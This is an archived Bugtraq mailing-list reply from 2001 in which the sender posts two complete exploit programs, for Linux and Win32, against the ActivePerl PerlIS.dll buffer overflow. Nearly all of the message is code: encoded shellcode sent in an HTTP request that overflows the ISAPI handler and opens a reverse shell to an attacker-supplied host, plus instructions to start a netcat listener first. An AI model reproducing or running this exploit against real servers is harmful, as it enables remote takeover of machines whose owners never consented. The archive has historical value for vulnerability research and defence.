[23211] in bugtraq
Re: NSFOCUS SA2001-07 : ActivePerl PerlIS.dll Remote Buffer
daemon@ATHENA.MIT.EDU (Indigo)
Wed Nov 21 18:46:11 2001
Date: 21 Nov 2001 01:38:45 -0000
Message-ID: <20011121013845.16165.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Indigo <indig0@talk21.com>
To: bugtraq@securityfocus.com
Mailer: SecurityFocus
In-Reply-To: <20011116015506.17854.qmail@mail.securityfocus.com>
>Received: (qmail 4025 invoked from network); 16
Nov 2001 04:11:34 -0000
>Received: from outgoing2.securityfocus.com
(HELO outgoing.securityfocus.com) (66.38.151.26)
> by mail.securityfocus.com with SMTP; 16 Nov
2001 04:11:34 -0000
>Received: from lists.securityfocus.com
(lists.securityfocus.com [66.38.151.19])
> by outgoing.securityfocus.com (Postfix)
with QMQP
> id 78A568F460; Thu, 15 Nov 2001
20:31:32 -0700 (MST)
>Mailing-List: contact bugtraq-
help@securityfocus.com; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@securityfocus.com>
>List-Help: <mailto:bugtraq-
help@securityfocus.com>
>List-Unsubscribe: <mailto:bugtraq-
unsubscribe@securityfocus.com>
>List-Subscribe: <mailto:bugtraq-
subscribe@securityfocus.com>
>Delivered-To: mailing list
bugtraq@securityfocus.com
>Delivered-To: moderator for
bugtraq@securityfocus.com
>Received: (qmail 26744 invoked from network); 16
Nov 2001 02:03:39 -0000
>Date: 16 Nov 2001 01:55:06 -0000
>Message-ID:
<20011116015506.17854.qmail@mail.securityfocus.c
om>
>Content-Type: text/plain
>Content-Disposition: inline
>Content-Transfer-Encoding: binary
>MIME-Version: 1.0
>X-Mailer: MIME-tools 5.411 (Entity 5.404)
>From: Jim <raxor@dexlink.com>
>To: bugtraq@securityfocus.com
>Subject: Re: NSFOCUS SA2001-07 : ActivePerl
PerlIS.dll Remote Buffer
> Overflow Vulnerability
>
>Mailer: SecurityFocus
>In-Reply-To:
<20011115113830.45A9.SECURITY@nsfocus.com>
>
>Has anyone been able to duplicate this bug ?
>
>Am I wrong or does the ISAPI version of ActivePerl
>execute .plx files and not .pl as mentioned in the
>advisory ?
>
Not only could I duplicate it, I exploited it. The exploit
uses .pl as the extension.
Cheers,
Indigo.
Jack for Linux:
/* jack.c - Active Perl ISAPI overflow exploit by
Indigo <indig0@talk21.com> 2001
Usage: jack <victim host> <victim port>
<attacker host> <attacker port>
Before executing jack start up a netcat
listener with the port set to 'attacker port'
eg: nc -l -p 'attacker port'
You may need to hit return a few times to
get the prompt up
main shellcode adapted from jill.c by dark
spyrit <dspyrit@beavuh.org>
Greets to:
Morphsta, Br00t, Macavity, Jacob &
Monkfish...Not forgetting D-Niderlunds
*/
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>
int main(int argc, char *argv[])
{
unsigned char shellcode[] =
"\x47\x45\x54\x20\x2f\x63\x67\x69\x2d\x62\x69
\x6e\x2f"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x8b\x94\xf8\x77\x42\x42\x42\x42"
"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15
\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95
\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96
\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14
\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66
\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6
\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1
\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96
\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97
\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95
\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41
\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95
\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1
\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5
\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95
\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5
\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95
\x18\xd2\xe5\xc5\x18\xd2"
"\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95
\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2
\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2
\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10
\x3e\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11
\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2
\x91\x55\x3d\x97\x94"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2
\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1
\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95
\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05
\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05
\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9
\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41
\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39
\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0
\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9
\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0
\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6
\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0
\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9
\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1
\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7
\xfa\xf6\xf0\xe6\xe6\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2
\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5
\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1
\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3
\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x33"
"\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33
\xdb\xb3\x24\x03\xc3\xff\xe0"
"\xeb\xb9\x90\x90\x05\x31\x8c\x6a"
"\x2E\x70\x6C\x20\x48\x54\x54\x50\x2F\x31\x2E\x30
\x0D\x0A\x0D\x0A\x00";
int s;
unsigned short int a_port;
unsigned long a_host;
struct hostent *ht;
struct sockaddr_in sin;
printf ("\njack - Active Perl ISAPI overflow
launcher\nby Indigo <indig0@talk21.com> 2001\n\n");
if (argc != 5)
{
printf ("Usage: %s <victim host>
<victim port> <attacker host> <attacker port>\n", argv
[0]);
exit (1);
}
if ((ht = gethostbyname(argv[1])) == 0){
herror(argv[1]);
exit(1);
}
sin.sin_port = htons(atoi(argv[2]));
a_port = htons(atoi(argv[4]));
a_port^=0x9595;
sin.sin_family = AF_INET;
sin.sin_addr = *((struct in_addr *)ht->h_addr);
if ((ht = gethostbyname(argv[3])) == 0){
herror(argv[3]);
exit(1);
}
a_host = *((unsigned long *)ht->h_addr);
a_host^=0x95959595;
shellcode[745]= (a_port) & 0xff;
shellcode[746]= (a_port >> 8) & 0xff;
shellcode[750]= (a_host) & 0xff;
shellcode[751]= (a_host >> 8) & 0xff;
shellcode[752]= (a_host >> 16) & 0xff;
shellcode[753]= (a_host >> 24) & 0xff;
if ((s = socket(AF_INET, SOCK_STREAM, 0))
== -1){
perror("socket");
exit(1);
}
printf("\nSending exploit....\n");
if ((connect(s, (struct sockaddr *) &sin, sizeof
(sin))) == -1){
perror("connect");
exit(1);
}
write(s, shellcode, strlen(shellcode));
sleep (1);
close (s);
printf ("Exploit sent.\n\n");
exit(0);
}
<CUT>
Jack for Win32:
/* jack.c - Active Perl ISAPI overflow exploit by
Indigo <indig0@talk21.com> 2001
Usage: jack <victim host> <victim port>
<attacker host> <attacker port>
Before executing jack start up a netcat
listener with the port set to 'attacker port'
eg: nc -l -p 'attacker port'
You may need to hit return a few times to
get the prompt up
main shellcode adapted from jill.c by dark
spyrit <dspyrit@beavuh.org>
Greets to:
Morphsta, Br00t, Macavity, Jacob &
Monkfish...Not forgetting D-Niderlunds
*/
#include <windows.h>
#include <stdio.h>
#include <winsock.h>
void main(int argc, char **argv)
{
SOCKET s = 0;
WSADATA wsaData;
int x;
unsigned short int a_port;
unsigned long a_host;
unsigned char shellcode[] =
"\x47\x45\x54\x20\x2f\x63\x67\x69\x2d\x62\x69
\x6e\x2f" //GET /cgi-bin/
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42" //offset to return address
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42
\x42\x42"
"\x42\x42\x42\x8b\x94\xf8\x77\x42\x42\x42\x42"
"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15
\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95
\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96
\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14
\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66
\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6
\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1
\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96
\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97
\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95
\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41
\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95
\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1
\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5
\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95
\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5
\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95
\x18\xd2\xe5\xc5\x18\xd2"
"\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95
\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2
\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2
\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10
\x3e\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11
\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2
\x91\x55\x3d\x97\x94"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2
\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1
\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95
\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05
\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05
\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9
\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41
\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39
\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0
\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9
\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0
\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6
\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0
\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9
\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1
\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7
\xfa\xf6\xf0\xe6\xe6\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2
\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5
\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1
\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3
\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x33"
"\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33
\xdb\xb3\x24\x03\xc3\xff\xe0"
"\xeb\xb9\x90\x90\x05\x31\x8c\x6a"
"\x2E\x70\x6C\x20\x48\x54\x54\x50\x2F\x31\x2E\x30
\x0D\x0A\x0D\x0A\x00"; //.pl HTTP/1.0
\n\n
printf ("\njack - Active Perl ISAPI overflow
launcher\nby Indigo <indig0@talk21.com> 2001\n\n");
if (argc < 2)
{
printf ("Usage: %s <victim host>
<victim port> <attacker host> <attacker port>\n", argv
[0]);
exit (0);
}
a_port = htons(atoi(argv[4]));
a_port^=0x9595;
a_host = inet_addr(argv[3]);
a_host^=0x95959595;
shellcode[745]= (a_port) & 0xff;
shellcode[746]= (a_port >> 8) & 0xff;
shellcode[750]= (a_host) & 0xff;
shellcode[751]= (a_host >> 8) & 0xff;
shellcode[752]= (a_host >> 16) & 0xff;
shellcode[753]= (a_host >> 24) & 0xff;
WSAStartup (MAKEWORD(2,0),
&wsaData);
s = socket (AF_INET, SOCK_STREAM,
IPPROTO_TCP);
if (INVALID_SOCKET != s)
{
SOCKADDR_IN anAddr;
anAddr.sin_family = AF_INET;
anAddr.sin_port = htons (atoi(argv
[2]));
anAddr.sin_addr.S_un.S_addr =
inet_addr(argv[1]);
if (connect(s, (struct sockaddr *)
&anAddr, sizeof (struct sockaddr)) == 0)
{
printf ("Sending
exploit....");
if ((x = send (s,
shellcode, strlen(shellcode), 0)) == 0)
{
printf ("send:
error sending first packet\n\n");
exit (0);
}
printf ("Exploit
sent.\n\n");
}
closesocket(s);
}
}
